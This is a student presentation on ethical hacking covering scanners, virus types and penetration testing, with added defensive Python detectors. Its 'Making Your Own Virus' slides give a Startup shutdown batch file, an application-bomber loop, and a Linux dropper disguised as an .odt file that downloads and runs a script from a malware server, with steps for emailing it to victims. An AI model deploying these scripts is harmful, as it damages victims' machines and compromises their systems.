Ethical Hacking PPT

Ethical Hacking
Presented By: Sahil Babbar, Rachit Jain, Jinkeon Kang
Mentor: Megha Agrawal

Contents
1. What is Hacking?
2. Difference between Hacker & Cracker
3. What is Ethical Hacking?
4. Hacker’s Skill Set

What Is Hacking ?

WHAT DO YOU THINK, WHO IS A HACKER ?


What Is Hacking?
Getting into a system/network using unauthorised methods to gain access to sensitive information, BUT…

Hacker
• Technically skilled professional.
• Scans for vulnerabilities & pitfalls in the system/network architecture, with permission.
• Doesn’t have any malicious intentions.
• Hacking is done for productive causes.

Cracker
• Technically skilled professional.
• Scans for vulnerabilities & pitfalls in the system/network architecture, without permission.
• Has malicious intentions.
• Cracking is done for theft, damaging systems, or fun.

What Is Ethical Hacking?
An Ethical Hacker is a skilled professional who hacks into a system/network to scan for pitfalls and the probable targets that a Cracker might exploit.

Ethical Hacking ≈ Hacking
Ethical Hacking ≠ Cracking

IMPORTANCE OF ETHICAL HACKING
• Helps to maintain privacy & full control.
• Helps to find system flaws, thereby avoiding leaking sensitive information to Crackers.
• Since computers are becoming accessible to more and more people, ethical hacking helps to maintain and strengthen computer security.
• Ethical hackers get appointed at esteemed government as well as multi-national organisations.

Hacker’s Skill Set
Knowledge about:
• Network Protocols like HTTP, HTTPS
• Authentication Techniques
• Firewall Architecture, Port Details
• Network Architectures
• Web Server Configurations
• Web Application Structures
• Database Setups with Client-Server Architecture
• HTML, JavaScript, Python, Ruby
• Shell Scripting
• And More…

Ethical Hacking Tools
• Vulnerability Scanners and their benefits
• Types of Vulnerability Scanners
• Password Cracking Tools
• Packet Sniffers
• Popular Hacking Tools
• Hacking Hardware

What are Hacking Tools?

❖ Hacking tools are software applications designed for one or several specific hacking/cracking purposes. They make complex hacking procedures easy to use and nowadays also offer good GUIs to help beginners in Ethical Hacking.

❖ There are numerous types of hacking tools, like:
1) Vulnerability Scanners
2) Port Scanners
3) Web Application Scanners
4) Password Cracking Tools
5) Packet Sniffers

Vulnerability Scanner

❖ A vulnerability can be defined as an unknown flaw in software, hardware or a network which can be exploited to gain unauthorised access.

❖ A Vulnerability Scanner is a computer program that detects weak spots in a network or computer system as a whole.

❖ Since all the communication is done using ports on the network, vulnerability scanners detect open ports which can be used to exploit weaknesses in the computer system.

Benefits of Vulnerability Scanner




❖ Quick and easy detection of weak spots in a computer system.

❖ Since it helps in identifying the vulnerabilities, the vulnerabilities can in turn be fixed.

❖ Keeping a frequent check on the computer system.

❖ Example: Top 10 flashlight apps on Google Play Store.
This was found by Gary Miliefsky at SnoopWall with the help of vulnerability scanners. These apps install Trojans that cannot be removed without doing a factory reset. All information is sucked up by servers mostly located in China, India and Russia.

Types of Vulnerability Scanners: Port Scanning
• TCP Scanning
• SYN Scanning
• UDP Scanning
• Window Scanning

❖ A Port Scanner is a software program that investigates (does not attack) a server for open and active ports by sending client requests to a range of server port addresses. It is used to verify security policies or to compromise the services running on the ports.

❖ Port Sweep is the technique of scanning multiple hosts for a particular listening port. E.g.: SQL-based worms port-sweep multiple servers looking for TCP port 1433.

Types of Vulnerability Scanners: TCP Scanner
Diagram: Hacker/SysAdmin using a TCP scanner sends carefully constructed packets to each of the 65536 ports of the victim host 192.168.1.1 (ports #80, #3000, #8080 and #1433 shown). Each port is reported as “Open or Accepted”, “Closed or Denied”, or “Filtered, Dropped, Blocked”.

Types of Vulnerability Scanners: TCP Scanner

❖ A TCP scanner uses the network functionality of the operating system to carry out the desired procedure.

❖ Procedure: Whenever a port on the host machine is open, the TCP three-way handshake completes and the TCP scanner immediately closes the connection, in order to avoid performing a DoS (Denial-of-Service) attack. If the connection is not closed, an error code is generated and registered in the logs, which can be detected by the system administrator.

❖ Advantage: Special user privileges are not necessary.

❖ Disadvantages:
• Using the OS functionality leaves the scanner with little low-level control over the packets.
• “Noisy” method, i.e. the services log the attacker’s IP address and an IDS can raise an alarm.

Types of Vulnerability Scanners: SYN Scanner
Diagram: Hacker/SysAdmin using a SYN scanner sends raw SYN packets to each of the 65536 ports of the victim host 192.168.1.1 (ports #80, #3000, #8080 and #1433 shown). An open port replies SYN-ACK and the scanner answers with an RST packet in order to prevent the 3-way TCP handshake from completing; if a port is closed and unfiltered, the host replies with RST.

Types of Vulnerability Scanners: SYN Scanner

❖ Advantages:
• The SYN scanner has full control of the packets that are sent to the host and can also monitor them: response timeouts, response details, etc.
• Services running on the ports never actually establish a connection. SYN scanning is also called ‘Half-Open Scanning’ as a full TCP connection is never established.
• The RST packet can cause damage to network devices like printers and scanners.

❖ Disadvantage: The SYN scanner needs privileges to generate the raw packets that initiate the whole process.
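Both a connect() scan and a half-open SYN scan leave the same trace on the target side: one source sending a bare SYN to many different ports in a short time. The following is an added example, not code from the presentation, showing how a defender could pick that pattern out of a connection log. The log format (timestamp, action, src/dst, dport, TCP flags) is a hypothetical one constructed for the example, as are the log lines themselves.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample firewall/connection log in a hypothetical syslog-like
# format (not from any real product):
#   <ISO timestamp> <ACTION> src=<ip> dst=<ip> dport=<port> flags=<TCP flags>
# A normal client (192.168.1.50) talks to two services; a scanner (10.0.0.7)
# sends one SYN to each of 15 different ports within a few seconds.
LEGIT_LINES = [
    "2023-05-01T10:00:01 ACCEPT src=192.168.1.50 dst=192.168.1.1 dport=80 flags=S",
    "2023-05-01T10:00:01 ACCEPT src=192.168.1.50 dst=192.168.1.1 dport=80 flags=A",
    "2023-05-01T10:00:05 ACCEPT src=192.168.1.50 dst=192.168.1.1 dport=443 flags=S",
    "2023-05-01T10:00:05 ACCEPT src=192.168.1.50 dst=192.168.1.1 dport=443 flags=A",
]
SCAN_LINES = [
    f"2023-05-01T10:00:0{i % 4} DROP src=10.0.0.7 dst=192.168.1.1 dport={port} flags=S"
    for i, port in enumerate(range(21, 36))
]
SAMPLE_LOG = "\n".join(LEGIT_LINES + SCAN_LINES)

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) flags=(?P<flags>\w+)$"
)


def parse_syn_events(log_text):
    """Return {src_ip: [(timestamp, dport), ...]} for SYN-only packets.

    Both a connect() scan and a half-open SYN scan begin every probe with a
    bare SYN, so SYN-only packets are the common signal for both methods.
    """
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # ignore lines that do not match the expected format
        flags = m.group("flags")
        if "S" in flags and "A" not in flags:
            ts = datetime.fromisoformat(m.group("ts"))
            events[m.group("src")].append((ts, int(m.group("dport"))))
    for src in events:
        events[src].sort()
    return events


def max_distinct_ports_in_window(events, window_seconds):
    """Sliding window over time-sorted (timestamp, port) pairs: the largest
    number of distinct ports one source probed within window_seconds."""
    best, left = 0, 0
    in_window = Counter()
    for ts, port in events:
        in_window[port] += 1
        while (ts - events[left][0]).total_seconds() > window_seconds:
            old_port = events[left][1]
            in_window[old_port] -= 1
            if in_window[old_port] == 0:
                del in_window[old_port]
            left += 1
        best = max(best, len(in_window))
    return best


def detect_port_scans(log_text, window_seconds=60, port_threshold=10):
    """Return {src_ip: distinct_ports} for every source that probed at least
    port_threshold distinct ports within window_seconds."""
    flagged = {}
    for src, evs in parse_syn_events(log_text).items():
        distinct = max_distinct_ports_in_window(evs, window_seconds)
        if distinct >= port_threshold:
            flagged[src] = distinct
    return flagged


if __name__ == "__main__":
    for src, n in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {n} distinct ports probed")
```

The threshold and window are the knobs a practitioner tunes: a scanner that spreads probes over hours to stay under the window needs a longer window, at the cost of more false positives from busy legitimate clients.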

Types of Vulnerability Scanners: UDP Scanner
Diagram: Hacker/SysAdmin using a UDP scanner sends application-specific UDP packets to the victim host 192.168.1.1 (ports #80, #3000, #53 and #1433 shown), just dropping packets to detect the state of the ports. For port #53 the response shows whether a DNS server is present or not. Diagram labels: “Reply from closed port”, “port blocked by firewall”, “ICMP port unreachable”, “Port is open”, “All ports are open”.

Types of Vulnerability Scanners: UDP Scanner

❖ Advantages:
• The UDP scanner can detect the number of open and closed ports by just dropping the packets and monitoring their responses.
• Connection-less protocol.

❖ Disadvantages:
• UDP application-specific scanning is limited by the number of ports for which an application-specific investigation packet is available.
• Technical challenges are involved.

Types of Vulnerability Scanners: Window Scanner
Diagram: Hacker/SysAdmin using a Window scanner against the victim host 192.168.1.1 (ports #80, #3000, #8080 and #1433 shown). Window field of the reply packet: 111111xxxxx. The window size of the packet is pre-pended with 1’s due to a design flaw.

Types of Vulnerability Scanners: Window Scanner

❖ Advantages:

❖ Disadvantages:
• Outdated
• Not trustworthy
• Nowadays, systems return the packet with pre-pended 0’s in the window field, therefore signalling all the ports as closed.

Types of Vulnerability Scanners: WebApp Scanner
Diagram: Hacker/SysAdmin using a WebApp scanner against the host’s website at address 192.168.1.1; the scanner talks to the front end, which performs CRUD operations, queries the DB and runs transactions on the DB.
• Enables Black Box Testing.
• Black Box Testing is a kind of application/system testing where the tester has no clue about the business logic or processing of the web application/software and only has information about the inputs and outputs.
• The scanner interacts with the UI and architecture only; it doesn’t scan source code.

Types of Vulnerability Scanners: WebApp Scanner

❖ Demo.

❖ Advantages:
• Very handy tools which enable quick testing of the overall web application with less expertise.
• The full stack, from front end to back end, can be tested with ease.
• Have good GUIs.

❖ Disadvantages:
• The same tools are used by the attackers, thereby bringing user and attacker to the same level.
• These are automated tools and help attackers to quickly test/find vulnerabilities and deploy botnets.
• Less efficient and reliable, as these tools are not updated at the same pace as web application frameworks.
• Cannot detect logical errors in the source code.

Common Attacks & Viruses


Virus

❖ A virus is a self-replicating malware program that keeps on duplicating/cloning itself and planting its copies in various data files, the boot sector, the kernel, etc. They infect the area they reside in and often use stealth techniques to hide from antivirus software or IDSs.

❖ Some viruses don’t harm the computer and some render it useless!

❖ Viruses have been causing billions of dollars of damage every year!

Images: Hex dump of the Blaster worm; MacMag virus on Mac (1988)

How it all started?

❖ BRAIN, written in January 1986 by two brothers named Basit and Amjad.

❖ Inspired by new functionalities in the MS-DOS operating system like multitasking and new networking features.

❖ They left their full address, COPYRIGHT information and phone numbers inside the code of BRAIN!

❖ What it does: Infects the boot sector of the floppy disk by replacing it with a copy of the virus; the actual boot sector is moved to another sector which is marked as bad. The bad sectors occupy 5KB of disk space and make 7KB of memory unavailable to MS-DOS. The malicious sector is named ©BRAIN and some description text is seen.

❖ Why they wrote it?: To catch copyright infringers. Really?

Types of Viruses
• Email
• Browser Hijacker
• Boot Infectors
• FAT
• Macro
• Memory Resident
• Overwrite
• Direct Action
• Directory

Macro Viruses

❖ These types of viruses are related to macros, which generally come embedded in programs/files like word processors, Microsoft Outlook, .mdb files, .xls files, etc. These viruses come into being whenever the user opens that document (that is why they are also called “document viruses”) and start infecting the user’s computer.

Diagram: the Macro Virus replaces/alters the Macro Document.

Examples: Relax, Melissa.A, bablas, 097M/Y2K

Memory Resident Viruses

❖ A Memory Resident Virus installs and plants itself as a part of the operating system and remains in RAM, whereas a non-memory-resident virus scans the disks for vulnerable targets after its execution, infects them and exits from the computer.

Diagram: OS, Resident Virus and Disk; the OS tries to access a disk sector. The virus directs the OS’s control flow to the replication program, thereby overwriting the interrupt handlers and other OS functions and finally infecting the targets.

Examples: Jerusalem, Onehalf, Magistr, Junkie, Satanbug, etc.

Web Scripting Virus

❖ A Web Scripting Virus resides inside the complex code of interactive web pages. This virus infects the complex code in order to compromise the user’s privacy and security. It can also infect browsers through the web pages and can spread through emails, RSS feeds, advertisement banners, etc. They can also breach access controls and are usually used to attack websites with a large user base, like social networking websites, banking websites, etc.

❖ This virus is planted by stealing cookies from the user, and then the attacker can hijack the user’s session. In this way the attacker can impersonate the user; this type of attack is called a persistent attack.

Example: JS.Fortnight
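The session hijack described above works because page scripts can read the session cookie and the browser then sends it on any request. As an added example (not from the presentation), the following audits Set-Cookie headers for the attributes that limit this: HttpOnly, Secure and SameSite. The response headers are constructed samples, not captured from any site.

```python
# Constructed sample HTTP response headers (not captured from any real site):
# the first sets a session cookie with no protective attributes, the second
# is the hardened form of the same cookie.
WEAK_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/"),
]
HARDENED_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sessionid=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]


def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie_name, {attribute_lower: value}).

    Flag attributes such as Secure and HttpOnly carry an empty value.
    """
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_cookie(value):
    """Return the weaknesses that make a stolen or hijacked session more likely."""
    name, attrs = parse_set_cookie(value)
    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly, page scripts can read the cookie")
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure, cookie is also sent over plain HTTP")
    # SameSite=None (or no SameSite at all) lets the cookie ride along on
    # cross-site requests, so only Lax and Strict count as protected here.
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite not Lax/Strict, sent on cross-site requests")
    return findings


def audit_response_headers(headers):
    """Audit every Set-Cookie header in a list of (name, value) pairs."""
    findings = []
    for hname, hvalue in headers:
        if hname.lower() == "set-cookie":
            findings.extend(audit_cookie(hvalue))
    return findings


if __name__ == "__main__":
    for finding in audit_response_headers(WEAK_HEADERS):
        print("WEAK:", finding)
    print("hardened findings:", audit_response_headers(HARDENED_HEADERS))
```

HttpOnly is the attribute that directly defeats cookie theft by injected script; Secure and SameSite close the network-sniffing and cross-site paths to the same session.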

Browser Hijacker

❖ A Browser Hijacker uses browsers as a medium to get to the victim’s computer by faking attachments/extensions/add-ons. They infect the browser’s functionality, e.g. changing default settings without the approval of the user, providing excessive advertisement links, etc.

Browser Hijacker: Attackers use malicious Google Chrome extensions to compromise users.

Other Viruses

❖ Overwrite Viruses replace the original information with malicious code and consume the same amount of file size. This is one of the reasons that IDSs cannot detect the infected files using file-size conditions. These files become useless in most cases.
Examples: Trivial.88.D, TRj.reboot, etc.

❖ Direct Action Viruses take action only when they are executed or invoked due to a condition set by the hacker. These types of viruses usually reside in the hard disk’s root directory. They have a special feature that they keep on changing their location, constantly.
Examples: Dir-2, Virdem, Vienna, etc.
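Because an overwrite virus keeps the file size unchanged, a size-based check is blind to it; comparing a cryptographic hash against a known-good baseline is not. The following added example (not from the presentation) contrasts the two checks on constructed sample file contents; the file names and bytes are made up, with byte strings standing in for files on disk.

```python
import hashlib

# Constructed sample "files" (byte strings standing in for files on disk):
# the overwritten copy of app.bin is exactly the same length as the original.
ORIGINAL_FILES = {
    "app.bin": b"LEGIT-PROGRAM-CODE-v1.0",
    "notes.txt": b"hello world",
}
CURRENT_FILES = {
    "app.bin": b"MALICIOUS-CODE-SAME-LEN",  # 23 bytes, same as the original
    "notes.txt": b"hello world",
    "extra.bin": b"new file",
}


def fingerprint(data):
    """Record both the size and the SHA-256 digest of a file's contents."""
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


def build_baseline(files):
    """Known-good snapshot: path -> fingerprint, taken while the files are trusted."""
    return {path: fingerprint(data) for path, data in files.items()}


def compare_by_size(baseline, current):
    """Naive check: a file counts as modified only if its size changed.
    An overwrite virus that preserves the size passes this check."""
    now = build_baseline(current)
    return {
        path: ("modified" if fp["size"] != baseline[path]["size"] else "unchanged")
        for path, fp in now.items()
        if path in baseline
    }


def compare_by_hash(baseline, current):
    """Hash check: detects overwrites even when the size is identical, and
    also reports files that were added or removed since the baseline."""
    report = {}
    now = build_baseline(current)
    for path, old in baseline.items():
        new = now.get(path)
        if new is None:
            report[path] = "removed"
        elif new["sha256"] == old["sha256"]:
            report[path] = "unchanged"
        elif new["size"] == old["size"]:
            report[path] = "modified (same size)"
        else:
            report[path] = "modified"
    for path in now:
        if path not in baseline:
            report[path] = "added"
    return report


if __name__ == "__main__":
    baseline = build_baseline(ORIGINAL_FILES)
    print("size check:", compare_by_size(baseline, CURRENT_FILES))
    print("hash check:", compare_by_hash(baseline, CURRENT_FILES))
```

On real systems the baseline must itself be stored where the malware cannot rewrite it (read-only media or a separate host), otherwise an infector can simply refresh the hashes after overwriting the files.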

Other Viruses

❖ Boot Infectors infect storage devices like floppy disks and hard disks, but their record resides in a different location altogether. These viruses infect the booting functionality of a computer as they directly infect the records in the master boot record. The BRAIN virus is also a boot infector, extended to harm FAT entries and drives, massively reducing performance.

❖ FAT Viruses infect the File Allocation Table, which is responsible for maintaining all the information about disk space, file locations, usable space, read-only space, writable space, etc.

Making Your Own Virus

❖ What to know?
• Windows: Batch Files
• Mac OS: AppleScript
• Linux: Shell, Python, Ruby, etc.

❖ Batch Files are a type of script that runs on Microsoft DOS and all versions of the Microsoft Windows operating system. These scripts are executed by the command-line interpreter, line by line, and are simply stored in plain text files. They have the .bat file extension. Conditional branching and looping are also supported by batch scripts.

Making Your Own Virus (Windows)

❖ Making a virus in Windows using batch files:

    copy cute-virus.bat "C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    shutdown -s -t 00

When the victim executes the batch file, it plants itself in the Startup folder of Windows, and when the computer starts up next time it shuts down automatically, in “0” seconds. This type of virus is generally called a “Shutdown Virus”.

Making Your Own Virus (Windows)

❖ Making a virus in Windows using batch files:

    @echo off
    rem hides the batch commands
    :X
    rem label used as the loop target
    start winword
    start mspaint
    start notepad
    ...
    start calc
    goto X

When the victim executes the batch file, it starts opening the applications in the above order in an infinite loop. This type of virus is called an “Application Bomber”.

Making Your Own Virus (Mac OS)

❖ Let’s start cooking our own virus in Mac OS X.

Making Your Own Virus (Mac OS)

❖ We can write short scripts like the one below:

    repeat
        tell application "Google Chrome"
            activate
        end tell
        tell application "RubyMine"
            activate
        end tell
        tell application "Android Studio"
            activate
        end tell
    end repeat

Making Your Own Virus (Linux)

❖ Making a virus in the Linux KDE flavour, using Python scripts:

    import os
    uname = os.getlogin()
    drop_dir = "/home/%s/.kde/Autostart" % uname
    os.makedirs(drop_dir)
    os.symlink("/home/%s/.local/.hidden/s.py" % uname, drop_dir + "/s.py")

Making Your Own Virus (Linux)
Creating a desktop icon:

    [Desktop Entry]
    Type=Application
    Name=some_text.odt
    Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi; python $DROP/s.py'
    Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Making Your Own Virus (Linux)
• Send this file over email to the victim.
• Once the file has been downloaded it will appear as some_text.odt on the user’s desktop with a harmless-looking icon.
• Once the attachment is opened by the victim it will infect the computer.
• This malware script will also restart whenever the user logs in to the computer again.
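The .desktop dropper above combines several signs a defender can check for mechanically: an “Application” whose Name ends in a document extension, an Exec line that fetches a URL with wget/curl, a hidden (dot) directory, and an inline shell command. The following added example (not from the presentation) parses .desktop files and reports those signs. Both sample entries are constructed; the suspicious one is shortened from the slide’s entry and keeps its placeholder URL, and the benign one is a made-up launcher.

```python
import re

# Constructed sample .desktop files. The first reproduces the shape of the
# dropper shown on the slide (shortened, placeholder URL kept); the second is
# a benign launcher made up for contrast.
SUSPICIOUS_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP; wget $URL -O $DROP/s.py ; python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
"""
BENIGN_DESKTOP = """\
[Desktop Entry]
Type=Application
Name=LibreOffice Writer
Exec=libreoffice --writer %U
Icon=libreoffice-writer
"""

DOCUMENT_EXTENSIONS = (".odt", ".doc", ".docx", ".pdf", ".xls", ".xlsx", ".txt")
DOWNLOADERS = ("wget", "curl")


def parse_desktop_entry(text):
    """Parse the [Desktop Entry] group of a .desktop file into key -> value."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def audit_desktop_entry(text):
    """Return findings typical of a launcher masquerading as a document."""
    e = parse_desktop_entry(text)
    name, exec_cmd = e.get("Name", ""), e.get("Exec", "")
    findings = []
    if e.get("Type") == "Application" and name.lower().endswith(DOCUMENT_EXTENSIONS):
        findings.append(f"Name '{name}' looks like a document but Type is Application")
    if any(tool in exec_cmd for tool in DOWNLOADERS) and re.search(r"https?://", exec_cmd):
        findings.append("Exec downloads a payload from a URL at launch time")
    # a path component starting with '.' right after '/' is a hidden directory
    if re.search(r"/\.[A-Za-z0-9_]", exec_cmd):
        findings.append("Exec writes to or runs from a hidden (dot) directory")
    if re.match(r"^(sh|bash)\s+-c\b", exec_cmd):
        findings.append("Exec runs an inline shell command instead of a program")
    return findings


if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_DESKTOP), ("benign", BENIGN_DESKTOP)):
        print(label, audit_desktop_entry(text))
```

The same checks apply to entries found in autostart locations such as ~/.kde/Autostart or ~/.config/autostart, where a persistence dropper like the one on the previous slide would put them.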

Penetration Testing

❖ Penetration Testing is a technique of breaking into a system/network legally, in order to identify vulnerabilities and security flaws. It is also called Pen Testing or PT. PT is done by a security expert and not by a hacker.

❖ Advantages
• PT helps in safeguarding the system/network from several security attacks or vulnerabilities.
• PT uncovers security flaws for the system administrator, who can better understand the nature and potential of threats; it exposes even the minutest flaws.
• PT can be performed on a wide variety of devices like servers, wired/wireless networks, mobile devices, etc.
• Helps save money which could otherwise have been lost to a hacker.

Penetration Testing

❖ Not as easy as it seems!

❖ The following steps are involved in PT:
• Reconnaissance involves gathering all the required specifications of the computer system/network involved.
• Scanning involves searching the system/network for vulnerabilities, security flaws and entry points.
• Exploitation involves using the vulnerabilities/flaws/entry points to attack the system/network and gain access.
• Maintaining Access involves keeping access to the system/network after exploitation and verifying what extent of access can be maintained.

Penetration Testing

❖ Demo.

nmap -sP 192.168.1.1/24
This command discovers all the hosts that are up and running on the network.

nmap -sT --reason 104.254.xxx.xxx
This command discovers the state of all the ports, the service running on them and the reason for the status of the ports.

nmap -A 104.254.xxx.xxx
This command discovers the state of all the ports, the service running on them and the reason for the status of the ports.
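A defender typically runs the same nmap scan against their own hosts and compares the result with the exposure they expect. The following added example (not from the presentation) parses the port table of nmap’s normal output and lists open ports that are not on an allowlist. The nmap output is a constructed sample in the shape nmap prints for a --reason scan; the host, ports and timing values are made up.

```python
import re

# Constructed sample of nmap's normal output for a --reason scan. Made up for
# this example: the host, the ports found and the timing are not real.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-01 10:00 UTC
Nmap scan report for 192.168.1.1
Host is up, received syn-ack (0.012s latency).
Not shown: 996 closed ports
Reason: 996 resets
PORT     STATE    SERVICE    REASON
22/tcp   open     ssh        syn-ack ttl 64
80/tcp   open     http       syn-ack ttl 64
443/tcp  filtered https      no-response
8080/tcp open     http-proxy syn-ack ttl 64
"""

# One row of the port table: "<port>/<proto> <state> <service> [<reason...>]"
PORT_LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<reason>.*))?$"
)


def parse_nmap_ports(text):
    """Extract the port table rows from nmap's normal (human-readable) output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE_RE.match(line.strip())
        if m:
            rows.append({
                "port": int(m.group("port")),
                "proto": m.group("proto"),
                "state": m.group("state"),
                "service": m.group("service"),
                "reason": (m.group("reason") or "").strip(),
            })
    return rows


def unexpected_open_ports(rows, allowed):
    """Open ports that are not in the allowlist of (port, proto) pairs the
    host is expected to expose."""
    return sorted(
        r["port"]
        for r in rows
        if r["state"] == "open" and (r["port"], r["proto"]) not in allowed
    )


if __name__ == "__main__":
    # Constructed expected exposure for the sample host.
    expected = {(22, "tcp"), (80, "tcp"), (443, "tcp")}
    rows = parse_nmap_ports(SAMPLE_NMAP_OUTPUT)
    for r in rows:
        print(f"{r['port']}/{r['proto']} {r['state']} {r['service']} ({r['reason']})")
    print("unexpected open ports:", unexpected_open_ports(rows, expected))
```

For automation, nmap’s -oX (XML) output is easier to consume than the normal output; the parser above is for the text shown in the demo.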

Zenmap: GUI-based Nmap client

P.T. Tool #1: w3af

❖ W3AF (Web Application Attack and Audit Framework) is a penetration testing framework.

❖ Used for:
• Safeguarding web applications against attacks
• Can be used for attacking web applications
• Scanning for vulnerabilities
• Breaking credentials
• And more

Screenshot: w3af home screen, showing the Target URL field, the type of attack and the P.T. profiles.

Scanning www.usebackpack.com and finding information and errors regarding the web application.

Trying to decode the URL using the Encode/Decode tool.

Using the information to create a Knowledge Base about the web application, in order to find vulnerabilities and security flaws.

Using the collected information to find vulnerabilities and security flaws. Here, we have found a Web Distributed Authoring and Versioning (WebDAV) misconfiguration vulnerability.

Using the collected information to try different kinds of exploits.

More vulnerability scanning of the web application, which reveals more information.

Scanning some other host and finding various vulnerabilities.

Listing only the vulnerabilities from the scanned information.

Getting the inter-linking diagram of all the URLs detected along with their respective HTML, CSS and JS files.

P.T. Tool #2: Metasploit

❖ Specialities:

Running an exploit is as simple as: